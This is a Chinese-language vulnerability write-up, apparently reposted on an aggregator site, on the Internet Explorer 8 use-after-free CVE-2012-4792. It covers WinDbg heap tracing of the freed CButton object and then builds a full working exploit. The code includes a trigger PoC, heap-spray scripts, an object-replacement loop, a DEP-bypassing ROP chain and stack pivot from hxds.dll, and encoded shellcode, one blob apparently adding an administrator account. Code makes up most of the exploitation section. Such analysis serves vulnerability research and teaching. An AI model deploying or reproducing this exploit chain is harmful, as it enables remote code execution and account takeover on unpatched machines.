漏洞分析之CVE-2012-4792(UAF)
来源:互联网 发布:linux 虚拟机 双系统 编辑:程序博客网 时间:2024/05/16 10:39
0x00 漏洞简介
2012年9月,通用漏洞与披露平台发布了一个存在IE浏览器的UAF漏洞。
报告指出:Microsoft Internet Explorer 6至9版本中的mshtml.dll中的CMshtmlEd::Exec函数中存在释放后使用漏洞。远程攻击者可利用该漏洞通过特制的网站,执行任意代码。
0x01 测试环境
操作系统:Windows XP sp3
浏览器:IE 8.00.6001.18702
漏洞文件:mshtml 8.00.6001.18702
调试器:windbg x86
利用windbg辅助工具设置系统堆栈调试功能
C:\Documents and Settings\Administrator>gflags.exe -I iexplore.exe +hpa +ustCurrent Registry Settings for iexplore.exe executable are: 02001000 ust - Create user mode stack trace database hpa - Enable page heap
0x02 漏洞验证
首先给出一段简单的poc验证CVE漏洞
<!doctype html><html><head><script> function exploit(){ var e0 = null; var e1 = null; var e2 = null; try { e0 = document.getElementById("a"); e1 = document.createElement("div"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.innerHTML = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); } </script> </head><body onload="exploit()"><form id="a"></form></body></html>
利用windbg attach IE 后 输入g继续运行运行,点击运行阻止的内容
观察windbg中代码停止的位置
结果发现edi(目测是一个申请堆的地址)是无效地址,程序崩溃。
这里应该取对象的虚表时发现地址不可取
下面会有调用虚表中的函数操作,那才是我们需要控制程序流的地方。
0x03 漏洞原理
首先我们利用!heap –p –a edi
查看堆的相关操作
我们从中可以看到,edi已经是释放后的堆了,这里mov eax,dword ptr[edi]
又对释放后的堆,再次使用。
下面有几个关键的问题没有解决:
- 什么时候创建的堆
- 什么时候释放的堆
- 什么时候使用的堆
0x1 堆的创建
为了方便查找堆的创建,在windbg加载IE后查看所有关于CButton的函数
我们可以得到一些有用的信息
0:005> x mshtml!CButton::*6a28f234 mshtml!CButton::HandleMessage = <no type information>6a28ee18 mshtml!CButton::s_classdescTagButton = <no type information>6a28ed83 mshtml!CButton::GetAAtype = <no type information>6a28f862 mshtml!CButton::GetValueHelper = <no type information>6a28ef62 mshtml!CButton::GetEnabled = <no type information>6a28f36a mshtml!CButton::GetThemeState = <no type information>6a28f75d mshtml!CButton::get_status = <no type information>6a28ee41 mshtml!CButton::CreateElement = <no type information>//很明显是一个按钮创建的过程6a28f035 mshtml!CButton::Notify = <no type information>6a0c4750 mshtml!CButton::s_StringTable = <no type information>6a28f1e0 mshtml!CButton::GetFocusShape = <no type information>6a28f8eb mshtml!CButton::SetStatusText = <no type information>6a28f70d mshtml!CButton::put_status = <no type information>6a28f128 mshtml!CButton::YieldCurrency = <no type information>6a0b0d8c mshtml!CButton::GetBtnHelper = <no type information>6a28ef95 mshtml!CButton::GetBorderInfo = <no type information>6a28f2f0 mshtml!CButton::ClickAction = <no type information>6a298d55 mshtml!CButton::createTextRange = <no type information>6a28f87d mshtml!CButton::SetValueHelper = <no type information>6a28eda5 mshtml!CButton::GetClassDesc = <no type information>6a28f3c2 mshtml!CButton::ApplyDefaultFormat = <no type information>6a28ef0d mshtml!CButton::GetSubmitInfo = <no type information>6a029d70 mshtml!CButton::s_apfnpdIHTMLButtonElement = <no type information>6a0ad720 mshtml!CButton::s_acpi = <no type information>6a0b0338 mshtml!CButton::GetNonThemedBorderInfo = <no type information>6a28f10b mshtml!CButton::AddCtxInfoToStream = <no type information>6a0c4740 mshtml!CButton::s_StringTableAggregate = <no type information>6a28f337 mshtml!CButton::GetThemeProperties = <no type information>6a28f7a3 mshtml!CButton::GetValue = <no type information>6a28edf4 mshtml!CButton::s_classdescButtonSubmit = <no type information>6a28eeb8 mshtml!CButton::Init2 = <no type information>6a188ee4 mshtml!CButton::s_apHdlDescs = <no type information>6a188f00 mshtml!CButton::s_ppropdescsInVtblOrderIHTMLButtonElement = <no type information>6a28ed27 mshtml!CButton::`scalar deleting destructor' = <no type information>//猜测是按钮销毁的过程6a0c4780 mshtml!CButton::s_AssocVTablePtr = <no type information>6a0af828 mshtml!CButton::GetElement = <no type information>69e765f0 mshtml!CButton::`vftable' = <no type information>6a28edd0 mshtml!CButton::s_classdescButtonReset = <no type information>6a034f04 mshtml!CButton::`vftable' = <no type information>6a28ed27 mshtml!CButton::`vector deleting destructor' = <no type information>6a28ed62 mshtml!CButton::SetAAtype = <no type information>6a28f9a6 mshtml!CButton::EnsureDefaultAttributes = <no type information>69fe3571 mshtml!CButton::GetDBindMethods = <no type information>
在上面我们可以找到两个比较有用的函数
6a28ee41 mshtml!CButton::CreateElement = <no type information>//很明显是一个按钮创建的过程6a28ed27 mshtml!CButton::`scalar deleting destructor' = <no type information>//猜测是按钮销毁的过程
我们对这两个地方下断点,直接利用地址进行断点设置
跟踪调试一下
我们发现了HeapAlloc函数 ,该函数位button按钮分配内存,查看一下分配的地址为0x70b2fa8
至此button的分配已经完成
0x2 堆的释放
刚刚我们把断点设在了mshtml!CButton::`scalar deleting destructor’ 函数这
在函数的中间我们发现了释放堆的代码,前三个压栈的是函数的参数,最后一个压栈的是要释放内存的地址0x70b2fa8 发现与申请的时候内存地址相吻合
堆的释放就结束了。
0x3 堆的重用
就在刚一开始的时候,程序崩溃的地方,访问di内存地址无效,造成的程序崩溃,成为能够控制代码执行的地方
0x4 与JS代码结合分析
前面一部分我们只知道了,在程序执行时汇编代码所做的的操作,如果对应到JS代码上,应该怎么理解。
这里有几个猜想
- e1.appendChild(document.createElement(‘button’)); 执行了HeapAlloc函数
- e2.outerText = “”; 把button对象释放了
- e2.appendChild(document.createElement(‘body’)); 是的内存重用
以上是对JS代码在堆上的操作进行的猜想。
下面修改一下验证代码,将上述payload改成如下所示
e0 = document.getElementById("a"); e1 = document.createElement("div"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); alert("init create"); e1.applyElement(e0); e2.innerHTML = ""; alert("delete?"); e2.appendChild(document.createElement('body')); alert("end");
经过试验得出以下结论
e1.appendChild(document.createElement(‘button’)); 为内存初始申请
堆的释放和再次使用在e2.innerHTML = "";
之后 和 e2.appendChild(document.createElement('body'));
之后
0x04 利用代码编写
我们回到之前的程序崩溃的地方,edi中的值无效,所以取堆的dword的时候是没有值的。借着在虚表中查找函数地址,在虚表偏移0xDC的地方存在函数跳转的地址。整个正向的函数执行过程很清楚,具体是我们怎么使用这些条件。利用方法如下:
- 在堆中喷满shellcode代码
- 替换CButton对象的dword值,到自己指定函数虚表中查找(可以是0x0c0c0c0c or 0x1c1c1c1c)
在虚表的0xDC偏移处,填写指定的shellcode地址
最后直接执行就是了
这里利用了一个关键技术,堆喷射技术,该技术是一种payload传递技术,它充分利用了javascript的特性。
0x1 堆喷射
为了控制虚表以及偏移处函数地址,我们在不知道精确地址的情况下可以采用堆喷射技术。
无DEP保护的情况
<html><head></head><body><script>//堆喷射 //Fix BSTR spec function alloc(bytes, mystr) { while (mystr.length<bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2); } block_size = 0x1000; Padding = ''; NopSlide = ''; var Shellcode =unescape('%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff'); for (c = 0; c < block_size; c++){ NopSlide += unescape('%u1c1c');} //shellcode hou NopSlide = NopSlide.substring(0,block_size - (Shellcode.length)); var OBJECT = Shellcode + NopSlide; OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb var evil = new Array(); for (var k = 0; k < 0x350; k++) { evil[k] = OBJECT.substr(0, OBJECT.length); } alert('spray done !');</script></body></html>
这一步只是将堆上喷满slip代码和shellcode。因为没有DEP所以不需要那么精准
DEP保护情况
先贴上精准喷射代码
<html><head></head><body><script>//堆喷射 //Fix BSTR spec function alloc(bytes, mystr) { while (mystr.length<bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2); } block_size = 0x1000; padding_size = 0xdFe; //这里必须根据自己的电脑来配置 为了对齐 Padding = ''; NopSlide = ''; var Shellcode =unescape('%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff'); for (p = 0; p < padding_size; p++){ Padding += unescape('%u1c1c');} for (c = 0; c < block_size; c++){ NopSlide += unescape('%u1c1c');} //jmp NopSlide = NopSlide.substring(0,block_size - (Shellcode.length + Padding.length)); var OBJECT = Padding + Shellcode + NopSlide; OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb var evil = new Array(); for (var k = 0; k < 0x350; k++) { evil[k] = OBJECT.substr(0, OBJECT.length); } alert('spray done !');</script></body></html>
因为我们需要构造rop链所以,需要知道准确的跳转地址,这里我们需要一定的尝试与计算
首先我们不设置padding_size的大小
及 padding_size = 0x00; //offset to 0x0c0c0c0c inside our 0x1000 hex block
我们观察一下0x1c1c1c1c所处的第一个堆块的位置0x1c0e0020
0x1c1c1c1c距离0x1c0e00200x1c1c1c1c-0x1c0e0020=0xe1bfc
因为每一个payload的大小是0x2000,这里引用别人的一张图,表述一下现在内存的情况
所以这里0xe1bfc%0x2000 = 0x1bfc
又因为unescape使得两个字节成为了一个字节,所以这里在填充的时候除2 padding_size = 0xdFe
我们看一下效果,发现成功定位,下一步工作就是替换虚表地址
0x2 对象占位
这一步很关键,前面分析了edi为对象指针,在释放后重新使用。这一步我们见改写CButton的dword使他指向自己造的虚表,达到劫持程序流。
这里需要了解为什么会占位成功。
关于堆分配器有几件事我们需要知道:
(1)由于内存动态分配和释放,会产生堆碎片;
(2)堆内存块释放。会由前端或后端分配器回收(依赖操作系统). 分配器类似于缓存服务那样优化内存块分配。像之前提到堆分配和释放产生堆碎片(=bad),为了较少堆碎片,新分配一块内存时,堆分配器会直接返回之前释放的一块同样大小的内存。从而减少了新分配的次数(=good);
(3)虽然堆内存是动态分配,但是分配器往往会连续的分配内存块 (为了减少堆碎片)这意味着从攻击者的角度来看堆是确定的。 连续的分配内存我们就可以在某个可预测的地址上布置我们的数据。
所以我们要申请一个和以前大小一样的内存空间,前面的内存申请已经很详细了,申请了0x58字节,所以我们这里也要重复申请0x58字节大小的内存。
for(var i = 0; i<0x550; i++)//这里必须根据自己的电脑来配置 { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); }
发现已经成功占位,eax=1c1c1c1c
下一步就是call [eax+0xdc]
<!doctype html><html><head><script> var arr_div = new Array(); var junk=unescape("%u1c1c%u1c1c"); while (junk.length < (0x100- 6)/2) { junk+=junk; } function helloWorld() { var e0 = null; var e1 = null; var e2 = null; try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); for(var i = 0; i<0x550; i++)//这里必须根据自己的电脑来配置 { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } }</script></head><body onload="eval(helloWorld())"><form id="a"></form><dfn id="b"></dfn></body></html>
这里有个问题,经常占位不成功,也不知道为什么。。
0x3 最终shellcode(含ROP)
无DEP:
最后写了一个没有带ROP的shellcode,能够成功劫持程序流,但不能继续执行(因为ie8自带DEP保护,必须用ROP绕过,日后再完善吧)
最后的shellcode执行流程是首先进行堆喷射,其次利用对象占位将刚刚释放的内存改写,接着就是UAF漏洞的执行了,会跳转到0x0c0c0c0c的地方去执行恶意代码
<!doctype html><html><head><script>//堆喷射 //Fix BSTR spec function alloc(bytes, mystr) { while (mystr.length<bytes) mystr += mystr; return mystr.substr(0, (bytes-6)/2); } block_size = 0x1000; padding_size = 0x5FC; //offset to 0x0c0c0c0c inside our 0x1000 hex block Padding = ''; NopSlide = ''; var Shellcode =unescape('%ud231%u30b2%u8b64%u8b12%u0c52%u528b%u8b1c%u0842%u728b%u8b20%u8012%u0c7e%u7533%u89f2%u03c7%u3c78%u578b%u0178%u8bc2%u207a%uc701%ued31%u348b%u01af%u45c6%u3e81%u6957%u456e%uf275%u7a8b%u0124%u66c7%u2c8b%u8b6f%u1c7a%uc701%u7c8b%ufcaf%uc701%u4b68%u6e33%u6801%u4220%u6f72%u2f68%u4441%u6844%u726f%u2073%u7468%u6172%u6874%u6e69%u7369%u2068%u6441%u686d%u6f72%u7075%u6368%u6c61%u6867%u2074%u6f6c%u2668%u6e20%u6865%u4444%u2620%u6e68%u2f20%u6841%u6f72%u334b%u3368%u206e%u6842%u7242%u4b6f%u7368%u7265%u6820%u7465%u7520%u2f68%u2063%u686e%u7865%u2065%u6368%u646d%u892e%ufee5%u534d%uc031%u5550%ud7ff'); for (p = 0; p < padding_size; p++){ Padding += unescape('%u0c0c');} for (c = 0; c < block_size; c++){ NopSlide += unescape('%u1c1c');} //shellcode hou NopSlide = NopSlide.substring(0,block_size - (Shellcode.length + Padding.length)); var OBJECT = Padding + Shellcode + NopSlide; OBJECT = alloc(0xfffe0, OBJECT); // 0xfffe0 = 1mb var evil = new Array(); for (var k = 0; k < 250; k++) { evil[k] = OBJECT.substr(0, OBJECT.length); } alert('spray done !');var arr_div = new Array(); var junk=unescape("%u0c0c%u0c0c"); while (junk.length < (0x100- 6)/2) { junk+=junk; } function helloWorld() { var e0 = null; var e1 = null; var e2 = null; try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); for(var i = 0; i<0x550; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } }</script></head><body onload="eval(helloWorld())"><form id="a"></form></body></html>
有DEP:
上述情况是在xp情况下 可以实行的应为没有windows的保护机制,而在本实验环境下是不能够实行的,在win7的ie8下有alsr以及dep的保护我们采取的措施是使用未开启alsr 的office2010的hxds.dll以及构造ROP链关闭ie8的数据保护。
使用location.href = 'ms-help://'
可以让ie浏览器自动加载hxds.dll模块(一般情况下ASLR是关掉的)
首先让浏览器加载hxds.dll
<!DOCTYPE html> <html> <head> <title>test</title> </head> <body> <script type="text/javascript"> location.href = 'ms-help://'; </script> </body> </html>
利用immunity Debugger 的mona插件寻找rop链
下面给出一种rop链的构造方法
var ropchain = "%u34b4%u51bf" + // 0x51bf34b4 # POP ESI # RETN [hxds.dll] "%u10b8%u51bd" + // 0x51bd10b8 # ptr to &VirtualProtect() [IAT hxds.dll]"%u2d97%u51bd" + // 0x51bd2d97 # MOV EAX,DWORD PTR DS:[ESI] # RETN [hxds.dll] "%ucba0%u51bd" + // 0x51bdcba0 # XCHG EAX,ESI # RETN 00 [hxds.dll] "%u79e2%u51c3" + // 0x51c379e2 # POP EBP # RETN [hxds.dll] "%u9683%u51c5" + // 0x51c59683 # & call esp [hxds.dll]"%u6fbd%u51c5" + // 0x51c56fbd # POP EAX # RETN [hxds.dll] "%ufdfe%ua17f" + // 0xa17ffdfe # put delta into eax (-> put 0x00000201 into ebx)"%u1e01%u51c1" + // 0x51C11E01 # ADD EAX,5E800403 # RETN [hxds.dll] "%u92d8%u51c3" + // 0x51C392D8 # XCHG EAX,EBX # RETN [hxds.dll]"%ue67d%u51bf" + // 0x51BFE67D # XOR EAX,EAX # RETN [hxds.dll] "%u6fbd%u51c5" + // 0x51c56fbd # POP EAX # RETN [hxds.dll] "%ufc3d%ua17f" + // 0xa17ffc3d # put delta into eax (-> put 0x00000040 into edx)"%u1e01%u51c1" + // 0x51C11E01 # ADD EAX,5E800403 # RETN [hxds.dll] "%u592b%u51bf" + // 0x51BF592B # XCHG EAX,EDX # RETN [hxds.dll] "%ucf3e%u51be" + // 0x51becf3e # POP ECX # RETN [hxds.dll] "%ud150%u51c5" + // 0x51c5d150 # &Writable location [hxds.dll]"%uf563%u51be" + // 0x51bef563 # POP EDI # RETN [hxds.dll] "%u7402%u51c0" + // 0x51c07402 # RETN (ROP NOP) [hxds.dll]"%u6fbd%u51c5" + // 0x51c56fbd # POP EAX # RETN [hxds.dll] "%u9090%u9090" + // 0x90909090 # nop"%ua8dc%u51bd"; // 0x51BDA8DC # PUSHAD # POP ECX # RETN [hxds.dll]
有了rop了链以及精准堆喷射,现在只需要stack pivot就OK了
同样我们使用hxds.dll中的rop构造栈翻转
var stackpivot += "%ub30e%u51c3"; // 0x51c3b30e # RETN [hxds.dll] (align esp)stackpivot += "%u198c%u51be"; // 0x51be198c # POP EBX # RETN [hxds.dll] stackpivot += "%u4a41%u51be"; // 0x51be4a41 # XCHG EAX,ESP # RETN [hxds.dll]
第一次执行第三行的XCHG代码使得栈翻转到堆上第一行的位置,执行第二行的时候正好将XCHG POP进ebx中去 避免了第二次翻转
下面是完整代码
<!doctype html><html><head><script> var arr_div = new Array(); var junk=unescape("%u0b30%u0c0c"); while (junk.length < (0x100- 6)/2) { junk+=junk; } var nops=unescape("%u9090%u9090"); while(nops.length<0x400) nops+=nops; while(nops.length<0x5f2) nops+=unescape("%ub30e%u51c3"); nops+=unescape("%u198c%u51be"); var code =unescape( "%u4a41%u51be%u34b4%u51bf%u10b8%u51bd%u2d97%u51bd%ucba0%u51bd"+ "%u79e2%u51c3%u9683%u51c5%u6fbd%u51c5%ufffe%ua17f"+ "%u1e01%u51c1%u92d8%u51c3%ue67d%u51bf%u6fbd%u51c5"+ "%ufc3d%ua17f%u1e01%u51c1%u592b%u51bf%ucf3e%u51be"+ "%ud150%u51c5%uf563%u51be%u7402%u51c0%u6fbd%u51c5"+ "%u9090%u9090%ua8dc%u51bd"+ //ROP结束 "%uc481%uf254%uffff%u2ebf%ue4ed%udbc0%ud9c8%u2474" + //shellcode calc.exe "%u58f4%uc933%u33b1%u7831%u0312%u1278%uee83%u06e9" + "%u1235%u4f19%ueab6%u30da%u0f3e%u62eb%u4424%ub35e" + "%u082e%u3853%ub862%u4ce0%ucfab%ufa41%ufe8d%uca52" + "%uac11%u4c91%uaeee%uaec5%u61cf%uae18%u9f08%ue2d3" + "%ud4c1%u1346%ua865%u125a%ua7a9%u6ce3%u77cc%uc697" +a "%ua7cf%u5c08%u5f87%u3a22%u5e38%u58e7%u2904%uab8c" + "%ua8fe%ue244%u9bff%ua9a8%u14c1%ub325%u9206%uc6d6" + "%ue17c%ud16b%u9846%u54b7%u3a5b%uce33%ubbbf%u8990" + "%ub734%udd5d%udb13%u3260%ue728%ub5e9%u6eff%u91a9" + "%u2bdb%ubb69%u917a%uc4dc%u7d9d%u6080%u6fd5%u13d5" + "%ue5b4%u9128%u40c2%ua92a%ue2cc%u9843%u6d47%u2513" + "%uca82%u6feb%u7a8f%u3664%u3f45%uc9e9%u03b3%u4a14" + "%ufb36%u52e3%ufe33%ud4a8%u72af%ub0a0%u21cf%u90c1" + "%ua4b3%u7851%u431a%u1bd2%u4162"); var offset=0x5F4; var junk_offset=nops.substring(0,0x5F4); var shellcode=junk_offset+code+nops.substring(0,0x800-0x5F4-code.length); while(shellcode.length<0x40000) { shellcode+=shellcode; } var block = shellcode.substring(0,0x40000); var heap_chunks = new Array(); for (var i=1; i < 0x700; i++) heap_chunks[i] = block.substring(0,0x40000); //location.href = 'ms-help://'; function helloWorld() { //alert(1); var e0 = null; var e1 = null; var e2 = null; try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); for(var i = 0; i<0x50; i++) { arr_div[i]= document.createElement("div"); arr_div[i].title= junk.substring(0,(0x58-6)/2); } } </script></head><body onload="helloWorld()"> <form id="a"> </form> <dfn id="b"> </dfn></body></html>
0x05 实验结果
- 漏洞分析之CVE-2012-4792(UAF)
- CVE 2013-3897 - UAF 漏洞分析学习学习
- CVE-2011-0065 Firefox mChannel UAF漏洞
- cve-2012-0158漏洞分析
- cve-2012-1876漏洞分析
- Windbg漏洞分析之CVE-2013-2551
- CVE-2012-0158 MSCOMCTL控件漏洞分析
- CVE-2012-0158 MSCOMCTL控件漏洞分析
- 安全漏洞--释放重引用(UAF)漏洞分析
- plaidctf-2016 unix_time_formatter uaf漏洞分析
- 从heap spray到CVE-2012-4782 (UAF)
- 漏洞分析之CVE-2010-2883(栈溢出)
- CVE-2014-0195漏洞分析
- CVE-2010-3333漏洞分析
- CVE-2010-2553漏洞分析
- CVE-2013-2551漏洞分析
- CVE-2016-1503 漏洞分析
- cve-2011-0027漏洞分析
- Linux学习之文件搜索命令(二)其他搜索命令 locate |which|whereis|grep
- mycat 的那些事(推荐)
- 51Nod 1284 2 3 5 7的倍数
- Storm集群安装
- 139 Word Break
- 漏洞分析之CVE-2012-4792(UAF)
- Java精选笔记_多线程(创建、生命周期及状态转换、调度、同步、通信)
- python 运行 hadoop 2.0 mapreduce 程序
- epoll vs select———— select内核源码赏析
- SpringBoot之初遇AutoConfigure
- java super, final 关键字, instance variable, class variable
- Spring MVC Controller中返回json数据中文乱码处理
- BZOJ 狼抓兔子(最小割)
- C#练习——交换两个变量